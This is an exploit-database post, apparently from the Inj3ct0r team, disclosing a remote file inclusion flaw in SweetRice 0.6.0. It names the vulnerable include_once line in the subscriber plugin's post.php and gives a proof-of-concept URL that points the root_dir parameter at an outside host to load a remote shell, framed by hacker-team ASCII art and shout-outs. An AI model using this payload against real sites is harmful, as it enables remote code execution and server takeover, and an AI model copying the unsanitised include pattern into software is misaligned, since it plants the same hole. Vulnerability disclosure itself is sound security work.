[+] SweetRice 0.6.0 Remote File Inclusion Vulnerabilities
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'`\ /\ \ /'`\ 0
0 /\, \ ___ /\\/\\ \ \ \ \ ,\/\ \/\ \ _ ___ 1
1 \//\ \ /' _ `\ \/\ \//\< /'\ \ \/\ \ \ \ \/\`'\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \/\ \ \\ \ \\ \ \ \/ 1
1 \ \\ \\ \\\ \ \ \/\ \\\ \\\ \/\ \\ 0
0 \//\//\//\ \\ \// \// \// \// \// 1
1 \ \/ >> Exploit database separated by exploit 0
0 \// type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################## 1
0 I'm bL4Ck_3n91n3 member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] Bugs Found: bL4Ck_3n91n3
[+] My id: http://inj3ct0r.com/author/2305
[+] Original : http://inj3ct0r.com/exploits/9701
[+] Download:
http://php.opensourcecms.com/scripts/details.php?scriptid=353&name=SweetRice
[x] RFI:
File : sweetrice/_plugin/subscriber/inc/post.php
Line 2 : include_once($root_dir."_plugin/fckeditor/fckeditor.php") ;
[x] RFI PoC:
http://localhost/sweetrice/_plugin/subscriber/inc/post.php?root_dir=http://shell??
[+] sHoutZ :
- My MoM
- My Dina
- cr4wl3r
- Inj3ct0r.com // r0073r